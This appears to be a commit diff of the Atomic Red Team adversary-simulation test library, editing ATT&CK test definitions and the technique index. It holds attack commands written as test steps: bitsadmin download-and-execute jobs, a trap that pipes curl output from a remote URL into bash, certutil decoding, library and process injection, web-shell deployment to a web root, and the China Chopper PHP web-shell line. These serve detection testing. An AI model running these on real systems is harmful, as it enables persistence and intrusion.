| remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
| local_file | Local file path to save downloaded file | path | C:\Windows\Temp\bitsadmin_flag.ps1|
| command_path | Path of command to execute | path | C:\Windows\system32\notepad.exe|
| command_line | Command line to execute | string | notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1|
| command_line | Command line to execute | string | C:\Windows\Temp\bitsadmin_flag.ps1|
#### Run it with `command_prompt`!
```
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} #{command_line}
bitsadmin.exe /complete AtomicBITS
bitsadmin.exe /resume #{bits_job_name}
```
<br/>
atomics/T1197/T1197.yaml
+4 -3
View File
@@ -45,7 +45,7 @@ atomic_tests:
- name: Persist, Download, & Execute
description: |
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
and execute a payload in multiple steps. This job will remain in the BITS queue for 90 days by default if not removed.
supported_platforms:
- windows
@@ -69,11 +69,12 @@ atomic_tests:
command_line:
description: Command line to execute
type: string
default: notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1
default: C:\Windows\Temp\bitsadmin_flag.ps1
executor:
name: command_prompt
command: |
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} #{command_line}
bitsadmin.exe /resume #{bits_job_name}
bitsadmin.exe /complete AtomicBITS
bitsadmin.exe /resume #{bits_job_name}
atomics/T1220/T1220.md
+6 -6
View File
@@ -37,8 +37,8 @@ Executes the code specified within a XSL script tag during XSL transformation us
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xmlfile | Location of the test XML file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1220\src\msxsl-xmlfile.xml|
| xslfile | Location of the test XSL script file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1220\src\msxsl-script.xsl|
| xmlfile | Location of the test XML file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml|
| xslfile | Location of the test XSL script file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl|
#### Run it with `command_prompt`!
```
@@ -56,8 +56,8 @@ Executes the code specified within a XSL script tag during XSL transformation us
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxsl-xmlfile.xml|
| xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxsl-script.xsl|
| xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml|
| xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl|
#### Run it with `command_prompt`!
```
@@ -76,7 +76,7 @@ Executes the code specified within a XSL script using a local payload.
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| wmic_command | WMI command to execute using wmic.exe | string | process list|
| local_xsl_file | Location of the test XSL script file on the local filesystem. | path | C:\AtomicRedTeam\atomics\T1220\src\wmic-script.xsl|
| local_xsl_file | Location of the test XSL script file on the local filesystem. | path | C:\AtomicRedTeam\atomics\T1220\src\wmicscript.xsl|
#### Run it with `command_prompt`!
```
@@ -95,7 +95,7 @@ Executes the code specified within a XSL script using a remote payload.
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| wmic_command | WMI command to execute using wmic.exe | string | process list|
| remote_xsl_file | Remote location of an XSL payload. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmic-script.xsl|
| remote_xsl_file | Remote location of an XSL payload. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl|
#### Run it with `command_prompt`!
```
atomics/T1220/T1220.yaml
+6 -6
View File
@@ -12,11 +12,11 @@ atomic_tests:
xmlfile:
description: Location of the test XML file on the local filesystem.
type: Path
default: C:\AtomicRedTeam\atomics\T1220\src\msxsl-xmlfile.xml
default: C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml
xslfile:
description: Location of the test XSL script file on the local filesystem.
type: Path
default: C:\AtomicRedTeam\atomics\T1220\src\msxsl-script.xsl
default: C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl
executor:
name: command_prompt
command: |
@@ -31,11 +31,11 @@ atomic_tests:
xmlfile:
description: Remote location (URL) of the test XML file.
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxsl-xmlfile.xml
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml
xslfile:
description: Remote location (URL) of the test XSL script file.
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxsl-script.xsl
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl
executor:
name: command_prompt
command: |
@@ -54,7 +54,7 @@ atomic_tests:
local_xsl_file:
description: Location of the test XSL script file on the local filesystem.
type: path
default: C:\AtomicRedTeam\atomics\T1220\src\wmic-script.xsl
default: C:\AtomicRedTeam\atomics\T1220\src\wmicscript.xsl
executor:
name: command_prompt
command: |
@@ -73,7 +73,7 @@ atomic_tests:
remote_xsl_file:
description: Remote location of an XSL payload.
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmic-script.xsl
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl
executor:
name: command_prompt
command: |
atomics/T1220/src/msxsl-script.xsl → atomics/T1220/src/msxslscript.xsl
View File
atomics/T1220/src/msxsl-xmlfile.xml → atomics/T1220/src/msxslxmlfile.xml
View File
atomics/T1220/src/wmic-script.xsl → atomics/T1220/src/wmicscript.xsl
View File
atomics/index.md
+30 -12
View File
@@ -128,7 +128,8 @@
- [T1154 Trap](./T1154/T1154.md)
- Atomic Test #1: Trap [macos, centos, ubuntu, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1100 Web Shell](./T1100/T1100.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md)
- Atomic Test #1: Persistence [windows]
- Atomic Test #2: Persistence Cleanup [windows]
@@ -287,6 +288,7 @@
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: Process Injection via PowerSploit [windows]
- Atomic Test #3: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #4: Process Injection via C# [windows]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1121 Regsvcs/Regasm](./T1121/T1121.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
@@ -373,6 +375,7 @@
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: Process Injection via PowerSploit [windows]
- Atomic Test #3: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #4: Process Injection via C# [windows]
- T1178 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053 Scheduled Task](./T1053/T1053.md)
- Atomic Test #1: At.exe Scheduled task [windows]
@@ -392,7 +395,8 @@
- Atomic Test #1: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #2: Disable tty_tickets for sudo caching [macos, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1100 Web Shell](./T1100/T1100.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
# discovery
- [T1087 Account Discovery](./T1087/T1087.md)
@@ -457,6 +461,8 @@
- Atomic Test #1: System Information Discovery [windows]
- Atomic Test #2: System Information Discovery [linux, macos]
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #4: Linux VM Check via Hardware [linux]
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
- [T1016 System Network Configuration Discovery](./T1016/T1016.md)
- Atomic Test #1: System Network Configuration Discovery [windows]
- Atomic Test #2: System Network Configuration Discovery [macos, linux]
@@ -560,11 +566,12 @@
- Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows]
- Atomic Test #5: Invoke-AppPathBypass [windows]
- Atomic Test #6: PowerShell Add User [windows]
- Atomic Test #7: Powershell MsXml COM object [windows]
- Atomic Test #8: Powershell XML requests [windows]
- Atomic Test #9: Powershell invoke mshta.exe download [windows]
- Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- Atomic Test #11: PowerShell Fileless Script Execution [windows]
- Atomic Test #7: Powershell MsXml COM object - no prompt [windows]
- Atomic Test #8: Powershell MsXml COM object - with prompt [windows]
- Atomic Test #9: Powershell XML requests [windows]
- Atomic Test #10: Powershell invoke mshta.exe download [windows]
- Atomic Test #11: Powershell Invoke-DownloadCradle [windows]
- Atomic Test #12: PowerShell Fileless Script Execution [windows]
- [T1121 Regsvcs/Regasm](./T1121/T1121.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvs Uninstall Method Call Test [windows]
@@ -638,6 +645,8 @@
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1184 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -665,12 +674,14 @@
- Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- Atomic Test #2: PowerShell [windows]
- [T1074 Data Staged](./T1074/T1074.md)
- Atomic Test #1: Stage data from Discovery.bat [windows]
- Atomic Test #1: Stage data from Discovery.sh [linux, macos]
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1005 Data from Local System](./T1005/T1005.md)
- Atomic Test #1: Search macOS Safari Cookies [macos]
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1114 Email Collection](./T1114/T1114.md)
- Atomic Test #1: T1114 Email Collection with PowerShell [windows]
- [T1056 Input Capture](./T1056/T1056.md)
- Atomic Test #1: Input Capture [windows]
- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -690,7 +701,10 @@
- Atomic Test #4: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #5: Data Compressed - nix - tar Folder or File [linux, macos]
- [T1022 Data Encrypted](./T1022/T1022.md)
- Atomic Test #1: Data Encrypted [macos, centos, ubuntu, linux]
- Atomic Test #1: Data Encrypted with zip and gpg [macos, centos, ubuntu, linux]
- Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- [T1030 Data Transfer Size Limits](./T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, centos, ubuntu, linux]
- [T1048 Exfiltration Over Alternative Protocol](./T1048/T1048.md)
@@ -727,7 +741,11 @@
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- [T1071 Standard Application Layer Protocol](./T1071/T1071.md)
- Atomic Test #1: Malicious User Agents [windows]
- Atomic Test #2: Malicious User Agents - Nix [linux, macos]
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1065 Uncommonly Used Port](./T1065/T1065.md)
atomics/index.yaml
+722 -102
View File
@@ -364,58 +364,81 @@ persistence:
}
'':
technique:
id: attack-pattern--c16e5409-ee53-4d79-afdc-4099dc9292df
id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Web Shell
description: |-
A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)
Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed.
name: Valid Accounts
description: "Adversaries may steal the credentials of a specific user or service
account using Credential Access techniques or capture credentials earlier
in their reconnaissance process through social engineering for means of gaining
Initial Access. \n\nCompromised credentials may be used to bypass access controls
placed on various resources on systems within the network and may even be
used for persistent access to remote systems and externally available services,
such as VPNs, Outlook Web Access and remote desktop. Compromised credentials
may also grant an adversary increased privilege to specific systems or access
to restricted areas of the network. Adversaries may choose not to use malware
or tools in conjunction with the legitimate access those credentials provide
to make it harder to detect their presence.\n\nAdversaries may also create
accounts, sometimes using pre-defined account names and passwords, as a means
for persistence through backup access in case other means are unsuccessful.
\n\nThe overlap of credentials and permissions across a network of systems
is of concern because the adversary may be able to pivot across accounts and
systems to reach a high level of access (i.e., domain or enterprise administrator)
to bypass access controls set within the enterprise. (Citation: TechNet Credential
Theft)"
external_references:
- external_id: T1100
url: https://attack.mitre.org/techniques/T1100
- external_id: T1078
url: https://attack.mitre.org/techniques/T1078
source_name: mitre-attack
- url: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
description: Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down
the China Chopper Web Shell - Part I. Retrieved March 27, 2015.
source_name: Lee 2013
- url: https://www.us-cert.gov/ncas/alerts/TA15-314A
description: US-CERT. (2015, November 13). Compromised Web Servers and Web
Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.
source_name: US-CERT Alert TA15-314A Web Shells
- external_id: CAPEC-560
url: https://capec.mitre.org/data/definitions/560.html
source_name: capec
- url: https://technet.microsoft.com/en-us/library/dn535501.aspx
description: Microsoft. (2016, April 15). Attractive Accounts for Credential
Theft. Retrieved June 3, 2016.
source_name: TechNet Credential Theft
- url: https://technet.microsoft.com/en-us/library/dn487457.aspx
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_version: '1.0'
x_mitre_data_sources:
- Anti-virus
- Authentication logs
- File monitoring
- Netflow/Enclave netflow
- Process monitoring
x_mitre_defense_bypassed:
- Firewall
- Host intrusion prevention systems
- Network intrusion detection system
- Process whitelisting
- System access controls
- Anti-virus
x_mitre_detection: |-
Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013)
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
<code><?php @eval($_POST['password']);></code>
Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running [cmd](https://attack.mitre.org/software/S0106) or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)
x_mitre_effective_permissions:
- SYSTEM
Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence.
x_mitre_permissions_required:
- User
- Administrator
x_mitre_effective_permissions:
- User
- Administrator
x_mitre_platforms:
- Linux
- Windows
- macOS
x_mitre_system_requirements:
- Adversary access to Web server with vulnerability or account to upload and
serve the Web shell file.
- Windows
type: attack-pattern
kill_chain_phases:
- phase_name: defense-evasion
kill_chain_name: mitre-attack
- phase_name: persistence
kill_chain_name: mitre-attack
- phase_name: privilege-escalation
kill_chain_name: mitre-attack
- phase_name: initial-access
kill_chain_name: mitre-attack
modified: '2018-10-17T00:14:20.652Z'
created: '2017-05-31T21:31:13.061Z'
created: '2017-05-31T21:31:00.645Z'
atomic_tests: []
T1103:
technique:
@@ -700,9 +723,9 @@ persistence:
'
- name: Persist, Download, & Execute
description: "This test simulates an adversary leveraging bitsadmin.exe to schedule
a BITS transfer \nand execute a payload in multiple steps. This job will remain
in the BITS queue for 90 days by default if not removed.\n"
description: |
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
and execute a payload in multiple steps. This job will remain in the BITS queue for 90 days by default if not removed.
supported_platforms:
- windows
input_arguments:
@@ -725,13 +748,14 @@ persistence:
command_line:
description: Command line to execute
type: string
default: notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1
default: C:\Windows\Temp\bitsadmin_flag.ps1
executor:
name: command_prompt
command: |-
command: |
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} #{command_line}
bitsadmin.exe /complete AtomicBITS
bitsadmin.exe /resume #{bits_job_name}
T1176:
technique:
@@ -3622,6 +3646,83 @@ persistence:
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT
exit
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT
T1100:
technique:
id: attack-pattern--c16e5409-ee53-4d79-afdc-4099dc9292df
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Web Shell
description: |-
A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)
Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed.
external_references:
- external_id: T1100
url: https://attack.mitre.org/techniques/T1100
source_name: mitre-attack
- url: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
description: Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down
the China Chopper Web Shell - Part I. Retrieved March 27, 2015.
source_name: Lee 2013
- url: https://www.us-cert.gov/ncas/alerts/TA15-314A
description: US-CERT. (2015, November 13). Compromised Web Servers and Web
Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.
source_name: US-CERT Alert TA15-314A Web Shells
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_version: '1.0'
x_mitre_data_sources:
- Anti-virus
- Authentication logs
- File monitoring
- Netflow/Enclave netflow
- Process monitoring
x_mitre_detection: |-
Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013)
<code><?php @eval($_POST['password']);></code>
Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running [cmd](https://attack.mitre.org/software/S0106) or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)
x_mitre_effective_permissions:
- SYSTEM
- User
x_mitre_platforms:
- Linux
- Windows
- macOS
x_mitre_system_requirements:
- Adversary access to Web server with vulnerability or account to upload and
serve the Web shell file.
type: attack-pattern
kill_chain_phases:
- phase_name: persistence
kill_chain_name: mitre-attack
- phase_name: privilege-escalation
kill_chain_name: mitre-attack
modified: '2018-10-17T00:14:20.652Z'
created: '2017-05-31T21:31:13.061Z'
identifier: T1100
atomic_tests:
- name: Web Shell Written to Disk
description: |
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk.
Idea from APTSimulator.
cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
supported_platforms:
- windows
input_arguments:
web_shell_path:
description: The path to drop the web shell
type: string
default: C:\inetpub\wwwroot
web_shells:
description: Path of Web Shell
type: path
default: C:\AtomicRedTeam\atomics\T1100\shells\
executor:
name: command_prompt
command: 'xcopy #{web_shells} #{web_shell_path}
'
T1084:
technique:
id: attack-pattern--e906ae4d-1d3a-4675-be23-22f7311c0da4
@@ -4119,9 +4220,9 @@ defense-evasion:
'
- name: Persist, Download, & Execute
description: "This test simulates an adversary leveraging bitsadmin.exe to schedule
a BITS transfer \nand execute a payload in multiple steps. This job will remain
in the BITS queue for 90 days by default if not removed.\n"
description: |
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
and execute a payload in multiple steps. This job will remain in the BITS queue for 90 days by default if not removed.
supported_platforms:
- windows
input_arguments:
@@ -4144,13 +4245,14 @@ defense-evasion:
command_line:
description: Command line to execute
type: string
default: notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1
default: C:\Windows\Temp\bitsadmin_flag.ps1
executor:
name: command_prompt
command: |-
command: |
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} #{command_line}
bitsadmin.exe /complete AtomicBITS
bitsadmin.exe /resume #{bits_job_name}
T1009:
technique:
@@ -5032,7 +5134,7 @@ defense-evasion:
name: command_prompt
command: |
cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp
cmd.exe /c %temp%tcm.tmp -decode #{executable}
cmd.exe /c %temp%tcm.tmp -decode #{executable} file.txt
T1089:
technique:
id: attack-pattern--2e0dd10b-676d-4964-acd0-8a404c92b044
@@ -7942,6 +8044,26 @@ defense-evasion:
command: 'echo #{path_to_shared_library} > /etc/ld.so.preload
'
- name: Process Injection via C#
description: |
Process Injection using C#
reference: https://github.com/pwndizzle/c-sharp-memory-injection
Excercises Five Techniques
1. Process injection
2. ApcInjectionAnyProcess
3. ApcInjectionNewProcess
4. IatInjection
5. ThreadHijack
supported_platforms:
- windows
input_arguments:
exe_binary:
description: Output Binary
type: Path
default: T1055.exe
executor:
name: command_prompt
command: ".\\bin\\#{exe_binary}\n"
T1121:
technique:
id: attack-pattern--215190a9-9f02-4e83-bb5f-e0589965a302
@@ -9062,11 +9184,11 @@ defense-evasion:
xmlfile:
description: Location of the test XML file on the local filesystem.
type: Path
default: C:\AtomicRedTeam\atomics\T1220\src\msxsl-xmlfile.xml
default: C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml
xslfile:
description: Location of the test XSL script file on the local filesystem.
type: Path
default: C:\AtomicRedTeam\atomics\T1220\src\msxsl-script.xsl
default: C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl
executor:
name: command_prompt
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
@@ -9084,11 +9206,11 @@ defense-evasion:
xmlfile:
description: Remote location (URL) of the test XML file.
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxsl-xmlfile.xml
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml
xslfile:
description: Remote location (URL) of the test XSL script file.
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxsl-script.xsl
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl
executor:
name: command_prompt
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
@@ -9109,7 +9231,7 @@ defense-evasion:
local_xsl_file:
description: Location of the test XSL script file on the local filesystem.
type: path
default: C:\AtomicRedTeam\atomics\T1220\src\wmic-script.xsl
default: C:\AtomicRedTeam\atomics\T1220\src\wmicscript.xsl
executor:
name: command_prompt
command: 'wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}
@@ -9130,7 +9252,7 @@ defense-evasion:
remote_xsl_file:
description: Remote location of an XSL payload.
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmic-script.xsl
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl
executor:
name: command_prompt
command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
@@ -9486,58 +9608,81 @@ privilege-escalation:
'
'':
technique:
id: attack-pattern--c16e5409-ee53-4d79-afdc-4099dc9292df
id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Web Shell
description: |-
A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)
Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed.
name: Valid Accounts
description: "Adversaries may steal the credentials of a specific user or service
account using Credential Access techniques or capture credentials earlier
in their reconnaissance process through social engineering for means of gaining
Initial Access. \n\nCompromised credentials may be used to bypass access controls
placed on various resources on systems within the network and may even be
used for persistent access to remote systems and externally available services,
such as VPNs, Outlook Web Access and remote desktop. Compromised credentials
may also grant an adversary increased privilege to specific systems or access
to restricted areas of the network. Adversaries may choose not to use malware
or tools in conjunction with the legitimate access those credentials provide
to make it harder to detect their presence.\n\nAdversaries may also create
accounts, sometimes using pre-defined account names and passwords, as a means
for persistence through backup access in case other means are unsuccessful.
\n\nThe overlap of credentials and permissions across a network of systems
is of concern because the adversary may be able to pivot across accounts and
systems to reach a high level of access (i.e., domain or enterprise administrator)
to bypass access controls set within the enterprise. (Citation: TechNet Credential
Theft)"
external_references:
- external_id: T1100
url: https://attack.mitre.org/techniques/T1100
- external_id: T1078
url: https://attack.mitre.org/techniques/T1078
source_name: mitre-attack
- url: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
description: Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down
the China Chopper Web Shell - Part I. Retrieved March 27, 2015.
source_name: Lee 2013
- url: https://www.us-cert.gov/ncas/alerts/TA15-314A
description: US-CERT. (2015, November 13). Compromised Web Servers and Web
Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.
source_name: US-CERT Alert TA15-314A Web Shells
- external_id: CAPEC-560
url: https://capec.mitre.org/data/definitions/560.html
source_name: capec
- url: https://technet.microsoft.com/en-us/library/dn535501.aspx
description: Microsoft. (2016, April 15). Attractive Accounts for Credential
Theft. Retrieved June 3, 2016.
source_name: TechNet Credential Theft
- url: https://technet.microsoft.com/en-us/library/dn487457.aspx
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_version: '1.0'
x_mitre_data_sources:
- Anti-virus
- Authentication logs
- File monitoring
- Netflow/Enclave netflow
- Process monitoring
x_mitre_defense_bypassed:
- Firewall
- Host intrusion prevention systems
- Network intrusion detection system
- Process whitelisting
- System access controls
- Anti-virus
x_mitre_detection: |-
Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013)
